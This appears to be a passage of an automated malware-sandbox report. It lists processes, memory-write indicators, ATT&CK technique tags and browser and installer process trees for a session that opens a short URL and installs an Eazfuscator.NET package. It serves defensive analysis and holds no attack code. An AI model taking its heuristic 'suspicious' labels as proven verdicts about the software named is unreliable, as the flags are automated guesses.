4384	firefox.exe
2736	@[email protected]
2736	@[email protected]
1392	@[email protected]
1392	@[email protected]
2916	@[email protected]
2916	@[email protected]
2216	@[email protected]
3716	@[email protected]
4592	@[email protected]
4592	@[email protected]
3748	@[email protected]
3340	@[email protected]
3220	@[email protected]
3052	@[email protected]
1008	@[email protected]
636	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3492 wrote to memory of 4404	3492	msedge.exe	82
PID 3492 wrote to memory of 4404	3492	msedge.exe	82
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 3724	3492	msedge.exe	83
PID 3492 wrote to memory of 1948	3492	msedge.exe	84
PID 3492 wrote to memory of 1948	3492	msedge.exe	84
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85
PID 3492 wrote to memory of 4632	3492	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5536	attrib.exe
2684	attrib.exe
3608	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://at1as.s-ul.eu/507rLMd1
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa7b6546f8,0x7ffa7b654708,0x7ffa7b654718
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:3732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:8
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:3224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:2552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
  2⤵
  PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  PID:4716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4056 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,9155568727929433337,2293531046013300197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:4492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1800

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa7ae0cc40,0x7ffa7ae0cc4c,0x7ffa7ae0cc58
  2⤵
  PID:4892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1920 /prefetch:2
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  PID:3028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2492 /prefetch:8
  2⤵
  PID:2788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3384,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4596,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4540 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:4020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4924 /prefetch:8
  2⤵
  PID:3500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4968,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4824 /prefetch:8
  2⤵
  PID:460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4724 /prefetch:8
  2⤵
  PID:4920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4836,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:4480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5216,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3204,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5280,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5328 /prefetch:1
  2⤵
  PID:4464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5332,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3472 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3452,i,16367731040807111353,16181304626231439908,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:4452

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3380

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2932
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3916
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d409f7c-eb2e-4e23-bbd0-ff2e660d5b8d} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" gpu
    3⤵
    PID:3876
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45631944-990a-4aac-aecf-4bea58da2c7d} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" socket
    3⤵
    - Checks processor information in registry
    PID:2376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2896 -childID 1 -isForBrowser -prefsHandle 3144 -prefMapHandle 3104 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b99d7270-efe9-4fc5-ac3a-940e547f2f15} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" tab
    3⤵
    PID:2976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4012 -childID 2 -isForBrowser -prefsHandle 4004 -prefMapHandle 2816 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {debc86f9-d157-4151-8650-0d48a4a0addb} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" tab
    3⤵
    PID:5004
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4804 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4796 -prefMapHandle 4792 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3122acac-8074-4079-9b55-0b100e61331c} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" utility
    3⤵
    - Checks processor information in registry
    PID:5204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3880 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5328 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72b95afe-3357-44bd-b0b4-400641e70ba6} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" tab
    3⤵
    PID:5752
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 4 -isForBrowser -prefsHandle 5516 -prefMapHandle 5520 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d8a5285-8971-41ee-a8cf-d60ce2e171b1} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" tab
    3⤵
    PID:5764
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5708 -childID 5 -isForBrowser -prefsHandle 5712 -prefMapHandle 5716 -prefsLen 26989 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d008b682-c2db-4fd7-bf5f-8c898461b2e4} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" tab
    3⤵
    PID:5776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5924 -childID 6 -isForBrowser -prefsHandle 6136 -prefMapHandle 6132 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a383f7fd-f608-4825-8a38-6250e79fc493} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" tab
    3⤵
    PID:4792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6136 -parentBuildID 20240401114208 -prefsHandle 6208 -prefMapHandle 6368 -prefsLen 29357 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7caeac0a-a4f2-4acc-ad50-6fddadd5942c} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" rdd
    3⤵
    PID:5524
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6308 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6336 -prefMapHandle 6312 -prefsLen 29357 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f337759-013c-476c-bbf7-5f9907678f4a} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" utility
    3⤵
    - Checks processor information in registry
    PID:5532
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6336 -childID 7 -isForBrowser -prefsHandle 4324 -prefMapHandle 6572 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {987c3de6-8eff-404b-80c9-7dde02da1034} 3916 "\\.\pipe\gecko-crash-server-pipe.3916" tab
    3⤵
    PID:5592

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\Eazfuscator.NET 2024.2 Setup.msi"
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:1008
- C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET Enlightenment.exe
  "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET Enlightenment.exe" /relaunch /setup
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:6108
- - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET Enlightenment.exe
    "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Components\Eazfuscator.NET Enlightenment.exe" /setup
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5232
  - - C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Eazfuscator.NET Assistant.exe
      "C:\Program Files (x86)\Gapotchenko\Eazfuscator.NET\Eazfuscator.NET Assistant.exe" /setup-launch
      4⤵
      Checks computer location settings
      Executes dropped EXE
